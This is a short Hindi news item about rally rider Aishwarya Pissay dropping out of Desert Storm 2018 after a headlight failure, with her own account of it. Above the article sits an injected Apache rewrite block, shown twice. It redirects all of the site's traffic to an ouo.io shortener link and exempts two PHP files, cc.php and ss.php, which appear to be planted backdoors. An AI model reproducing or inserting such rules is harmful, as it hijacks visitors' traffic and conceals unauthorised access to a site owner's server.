
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 303
Previous Nextबीकानेर। हेडलाइट में आई खराबी के कारण राष्ट्रीय महिला रेसिंग और रैली चेम्पियन ऐश्वर्या पिस्साई का डेजर्ट स्टॉॅर्म-2018 रैली में सफर खत्म हो गया है। उन पर 100 घंटों की पेनाल्टी लगी थी जिसके कारण सप्ताह भर तक चलने वाली क्रॉस कंट्री रैली से वह बाहर हो गई हैं। ऐश्वर्या ने कहा, "मैं दिन के पहले चरण में अच्छा जा रही थी और अच्छी लय में थी। मैं कुछ बाइकों को पीछे भी छोड़ा और काफी आत्मविश्वास महसूस कर रही थी, लेकिन हेडलाइट की समस्या ने मुझे अगले दौर में जाने से रोक दिया।" उन्होंने कहा, "मैं पहली बार रात का चरण कर रही थी और यह मेरे लिए नया अनुभव रहा। अचानक हेडलाइट की समस्या आ गई। मैं अंधेरे में फंस गई थी, लेकिन मैं बाकी बाइकों के पीछे चल रही थी। इसके बाद में फंस गई।"